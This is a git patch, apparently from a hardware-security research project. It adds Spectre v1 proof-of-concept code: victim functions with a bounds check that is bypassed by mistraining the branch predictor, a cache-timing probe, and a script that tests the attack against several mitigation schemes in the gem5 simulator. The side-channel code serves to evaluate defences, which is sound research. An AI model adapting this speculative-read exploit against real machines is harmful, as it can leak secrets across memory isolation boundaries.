From cd184d861f5702e0ec5855e7247584c799bd24a2 Mon Sep 17 00:00:00 2001 From: Iru Cai Date: Wed, 10 Apr 2019 16:00:23 +0800 Subject: add attack code and attack test script --- attack_code/evict_load/attack.c | 50 +++++++++++++++++++++++++++++++++++++ attack_code/evict_load/build.sh | 4 +++ attack_code/evict_load/victim.asm | 22 ++++++++++++++++ attack_code/evict_load/victim.c | 16 ++++++++++++ attack_code/victim_v10/attack_v10.c | 41 ++++++++++++++++++++++++++++++ attack_code/victim_v10/build.sh | 1 + attack_code/victim_v10/victim_v10.c | 17 +++++++++++++ attack_test.sh | 28 +++++++++++++++++++++ 8 files changed, 179 insertions(+) create mode 100644 attack_code/evict_load/attack.c create mode 100755 attack_code/evict_load/build.sh create mode 100644 attack_code/evict_load/victim.asm create mode 100644 attack_code/evict_load/victim.c create mode 100644 attack_code/victim_v10/attack_v10.c create mode 100755 attack_code/victim_v10/build.sh create mode 100644 attack_code/victim_v10/victim_v10.c create mode 100755 attack_test.sh diff --git a/attack_code/evict_load/attack.c b/attack_code/evict_load/attack.c new file mode 100644 index 000000000..85a2017f0 --- /dev/null +++ b/attack_code/evict_load/attack.c @@ -0,0 +1,50 @@ +#include +#include +#include +#include + +/* default: 64B line size, L1-D 64KB assoc 2, L1-I 32KB assoc 2, L2 2MB assoc 8 */ +#define LLC_SIZE (2 << 20) + +uint8_t dummy[LLC_SIZE]; +size_t array_size = 4; +uint8_t array1[200] = {1, 2, 3, 4}; +uint8_t array2[256 * 64 * 2]; +uint8_t X; +uint8_t array3[4096]; +uint8_t tmp; + +uint8_t victim(size_t idx); + +int main() +{ + unsigned long t[256]; + volatile uint8_t x; + + victim(0); + victim(0); + victim(0); + victim(0); + victim(0); + + memset(dummy, 1, sizeof(dummy)); // flush L2 + X = 123; // set the secret value, and also bring it to cache + + _mm_mfence(); + + size_t attack_idx = &X - array1; + victim(attack_idx); + + for (int i = 0; i < 256; i++) { + unsigned int junk; + unsigned long time1 = __rdtscp(&junk); + x ^= array2[i * 64]; + unsigned long time2 = __rdtscp(&junk); + t[i] = time2 - time1; + } + + printf("attack_idx = %ld\n", attack_idx); + for (int i = 0; i < 256; i++) { + printf("%d: %d, %s\n", i, t[i], (t[i] < 40)? "\x1b[1;31mhit\x1b[m": "miss"); + } +} diff --git a/attack_code/evict_load/build.sh b/attack_code/evict_load/build.sh new file mode 100755 index 000000000..9cbf27d98 --- /dev/null +++ b/attack_code/evict_load/build.sh @@ -0,0 +1,4 @@ +#!/bin/sh + +nasm -f elf64 victim.asm +gcc -static -O2 -o ../../attack attack.c victim.o diff --git a/attack_code/evict_load/victim.asm b/attack_code/evict_load/victim.asm new file mode 100644 index 000000000..bd3effbc3 --- /dev/null +++ b/attack_code/evict_load/victim.asm @@ -0,0 +1,22 @@ +; code similar to gcc -O2 -c victim.c, working on gem5 +; it doesn't store rdi to stack as -O0 + +extern array1 +extern array2 +extern array_size + +global victim + +victim: +xor eax, eax +cmp [rel array_size], rdi +jbe fret +lea rax, [rel array1] +add rax, rdi +movzx eax, byte [rax] +shl eax, 6 +cdq +lea rdx, [rel array2] +mov eax, [rdx + rax] +fret: +rep ret diff --git a/attack_code/evict_load/victim.c b/attack_code/evict_load/victim.c new file mode 100644 index 000000000..e9d3249bf --- /dev/null +++ b/attack_code/evict_load/victim.c @@ -0,0 +1,16 @@ +#include +#include +#include + +extern uint8_t array1[]; +extern uint8_t array2[]; +extern size_t array_size; + +uint8_t victim(size_t idx) +{ + if (idx < array_size) { + return array2[array1[idx] * 64]; + } + return 0; +} + diff --git a/attack_code/victim_v10/attack_v10.c b/attack_code/victim_v10/attack_v10.c new file mode 100644 index 000000000..1c1eecd45 --- /dev/null +++ b/attack_code/victim_v10/attack_v10.c @@ -0,0 +1,41 @@ +#include +#include +#include +#include + +/* default: 64B line size, L1-D 64KB assoc 2, L1-I 32KB assoc 2, L2 2MB assoc 8 */ +#define LLC_SIZE (2 << 20) + +uint8_t dummy[LLC_SIZE]; +size_t array_size = 4; +uint8_t array1[200] = {1, 2, 3, 4}; +uint8_t array2[256 * 64 * 2]; +uint8_t X; +uint8_t temp = 1; + +void victim_function_v10(size_t x, uint8_t k); + +int main() +{ + victim_function_v10(0, 0); + victim_function_v10(0, 0); + victim_function_v10(0, 0); + victim_function_v10(0, 0); + victim_function_v10(0, 0); + + memset(dummy, 1, sizeof(dummy)); // flush L2 + X = 123; // set the secret value, and also bring it to cache + + _mm_mfence(); + + size_t attack_idx = &X - array1; + victim_function_v10(attack_idx, 123); + + unsigned int junk; + volatile uint8_t x; + unsigned long time1 = __rdtscp(&junk); + x ^= array2[0]; + unsigned long time2 = __rdtscp(&junk); + + printf("%d\n", time2 - time1); +} diff --git a/attack_code/victim_v10/build.sh b/attack_code/victim_v10/build.sh new file mode 100755 index 000000000..07897b62d --- /dev/null +++ b/attack_code/victim_v10/build.sh @@ -0,0 +1 @@ +gcc -O2 -o ../../attack_v10 attack_v10.c victim_v10.c -static diff --git a/attack_code/victim_v10/victim_v10.c b/attack_code/victim_v10/victim_v10.c new file mode 100644 index 000000000..193ac750d --- /dev/null +++ b/attack_code/victim_v10/victim_v10.c @@ -0,0 +1,17 @@ +/* code from https://www.paulkocher.com/doc/MicrosoftCompilerSpectreMitigation.html */ + +#include +#include + +extern size_t array_size; +extern uint8_t array1[]; +extern uint8_t array2[]; +extern uint8_t temp; + +void victim_function_v10(size_t x, uint8_t k) +{ + if (x < array_size) { + if (array1[x] == k) + temp &= array2[0]; + } +} diff --git a/attack_test.sh b/attack_test.sh new file mode 100755 index 000000000..a50b3bc86 --- /dev/null +++ b/attack_test.sh @@ -0,0 +1,28 @@ +#!/bin/bash + +GEM5="./build/X86_MESI_Two_Level/gem5.opt -q configs/example/se.py --cpu-type=DerivO3CPU --ruby --needsTSO=1 --output=stdout.txt" +SCMS=( +"--scheme=UnsafeBaseline" +"--scheme=SpectreSafeInvisibleSpec --useIFT=0" +"--scheme=SpectreSafeInvisibleSpec --useIFT=1 --trackBranch=0" +"--scheme=SpectreSafeInvisibleSpec --useIFT=1 --trackBranch=1" +"--scheme=SpectreSafeFence --useIFT=0" +"--scheme=SpectreSafeFence --useIFT=1 --trackBranch=0" +"--scheme=SpectreSafeFence --useIFT=1 --trackBranch=1" +) + +echo "Testing Spectre PoC victim function" +for scm in "${SCMS[@]}" +do + echo "$scm" + $GEM5 $scm -c attack + grep hit stdout.txt && echo unsafe || echo safe +done + +echo "Testing victim function v10" +for scm in "${SCMS[@]}" +do + echo "$scm" + $GEM5 $scm -c attack_v10 + grep '^[123]' stdout.txt && echo unsafe || echo safe +done -- cgit v1.2.3